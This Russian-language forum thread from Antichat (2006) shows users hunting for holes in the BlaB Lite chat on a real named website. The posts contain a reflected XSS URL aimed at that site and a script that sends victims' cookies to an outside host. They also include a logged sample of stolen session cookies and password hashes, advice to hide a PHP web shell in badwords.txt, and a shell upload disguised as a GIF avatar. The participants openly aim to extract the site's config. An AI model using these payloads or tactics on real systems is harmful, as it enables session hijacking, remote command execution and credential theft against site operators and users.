Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Исследование чата BlaB Lite |

08.12.2006, 19:13
|
|
Познающий
Регистрация: 22.11.2006
Сообщений: 56
Провел на форуме: 125168
Репутация:
20
|
|
Исследование чата BlaB Lite
набрёл на один чат:
http://schekino.net/chat/login.php
решил вот поисследовать его.
в итоге оказалось что чат простой до безобразия. 95 кб в архиве.
посмотрел возможные уязвимости на securitylab. ничего нету
может тогда попробуем поискать уязвимости вместе?
я пока мельком пробежался по нему.
из папки incl утащил в чистом виде пару файлов:
mysqli_functions.inc, mysql_functions.inc, main.inc,smilies.inc, sqlite_functions.inc, skin.inc
Файл config.php в корневой лежит.
при открытии, что логично, пустая страница.
переменные все там хранятся.
теперь вот думаем как бы всё это дело утащить. может sql инъекции есть ? или ещё что.
|
|
|

08.12.2006, 19:33
|
|
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме: 6860213
Репутация:
378
|
|
мдя, за 3минуты нашол xss:
http://schekino.net/chat/info.php?why=%22%3E%3Cscript%3Ealert(document.cook ie)%3C/script%3E
хотя толку от нее нету...
Последний раз редактировалось InferNo23; 08.12.2006 в 19:39..
|
|
|

08.12.2006, 19:53
|
|
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
Провел на форуме: 5302668
Репутация:
2054
|
|
я думаю никто не будет против по поводу того что я спущу найденое мной в паблик
http://localhost/chat/info.php?reason=<script%20src=http://localhost/s.js></script>
s.js
PHP код:
img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
PHP код:
REFERER=http://localhost/chat/info.php?reason=%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%2F%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
QUERY=blab_id=1-bb2e48de1ba9a89497564acb9b584cc4; blab_pass=813dfe9bd7b89fbcc5fd29d2be091bac; blab_lang=9; blab_time=3
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1)
+ с правами админа можно сдампить БД юзеров,
в badwords.txt можно безпалевно вписать
PHP код:
<?php system($_GET[cmd]); ?>
- админ этого неувидит, а так же с можно загрузить картинку вместо авы, тоесть PHP шелл без всяких заголовков, правда с расширением gif... и при наличии на сайте локального инклуда я думаю понимаете что можно сделать 
__________________
Лучший способ защиты - это нападение!!!
|
|
|

08.12.2006, 19:57
|
|
Познающий
Регистрация: 22.11.2006
Сообщений: 56
Провел на форуме: 125168
Репутация:
20
|
|
InferNo23
согласен. может ещё что сможем интересное найти?
Может отсюда что можно накопать?
http://schekino.net/chat/empty.txt
|
|
|

08.12.2006, 20:00
|
|
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
Провел на форуме: 5302668
Репутация:
2054
|
|
сорцы чата на nulled-warez.org есть, если ты за сорцами гонишся...
__________________
Лучший способ защиты - это нападение!!!
|
|
|

08.12.2006, 20:10
|
|
Познающий
Регистрация: 22.11.2006
Сообщений: 56
Провел на форуме: 125168
Репутация:
20
|
|
Сообщение от TANZWUT
сорцы чата на nulled-warez.org есть, если ты за сорцами гонишся...
сорцы у меня есть. они ж в открытом доступе есть на оф сайте.
мне интереснее как можно выудить инфу из config.php
важно не само его содержание, а способ узнать инфу
тем более, на чате нет системы регистрации. выбрал любой ник и вошёл. админ интерфейса тоже вроде как нет.
вот потому и думаю что в итоге то в чате конфиденциального есть
|
|
|

09.12.2006, 19:19
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме: 5355463
Репутация:
2258
|
|
мне интереснее как можно выудить инфу из config.php
только если у тебя есть шелл или инклуд локальный..
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|